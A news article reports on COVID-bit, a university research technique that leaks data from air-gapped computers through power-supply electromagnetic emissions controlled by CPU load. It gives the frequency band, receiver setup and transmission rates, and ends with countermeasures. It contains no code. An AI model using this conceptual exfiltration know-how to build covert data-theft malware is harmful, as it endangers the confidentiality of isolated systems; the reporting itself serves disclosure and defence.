An unconventional data exfiltration method leverages a previously undocumented covert channel to leak sensitive information from air-gapped systems.

"The information emanates from the air-gapped computer over the air to a distance of 2 m and more and can be picked up by a nearby insider or spy with a mobile phone or laptop," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research Center in the Ben Gurion University of the Negev in Israel and the head of Offensive-Defensive Cyber Research Lab, said in a new paper shared with The Hacker News.

The mechanism, dubbed **COVID-bit**, leverages malware planted on the machine to generate electromagnetic radiation in the 0-60 kHz frequency band that's subsequently transmitted and picked up by a stealthy receiving device in close physical proximity.

This, in turn, is made possible by exploiting the dynamic power consumption of modern computers and manipulating the momentary loads on CPU cores.

COVID-bit is the latest technique devised by Dr. Guri this year, after SATAn, GAIROSCOPE, and ETHERLED, which are designed to jump over air-gaps and harvest confidential data.

Air-gapped networks, despite their high level of isolation, can be compromised by various strategies such as infected USB drives, supply chain attacks, and even rogue insiders.

Exfiltrating the data after breaching the network, however, is a challenge due to the lack of internet connectivity, necessitating that attackers concoct special methods to deliver the information.

The COVID-bit is one such covert channel that's used by the malware to transmit information by taking advantage of the electromagnetic emissions from a component called switched-mode power supply (SMPS) and using a mechanism called frequency-shift keying (FSK) to encode the binary data.

"By regulating the workload of the CPU, it is possible to govern its power consumption and hence control the momentary switching frequency of the SMPS," Dr. Guri explains.

"The electromagnetic radiation generated by this intentional process can be received from a distance using appropriate antennas" that cost as low as $1 and can be connected to a phone's 3.5 mm audio jack to capture the low-frequency signals at a bandwidth of 1,000 bps.

The emanations are then demodulated to extract the data. The attack is also evasive in that the malicious code doesn't require elevated privileges and can be executed from within a virtual machine.

An evaluation of the data transmissions reveals that keystrokes can be exfiltrated in near real-time, with IP and MAC addresses taking anywhere between less than 0.1 seconds to 16 seconds, depending on the bitrate.

Countermeasures against the proposed covert channel include carrying out dynamic opcode analysis to flag threats, initiate random workloads on the CPU processors when anomalous activity is detected, and monitoring or jamming signals in the 0-60 kHz spectrum.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac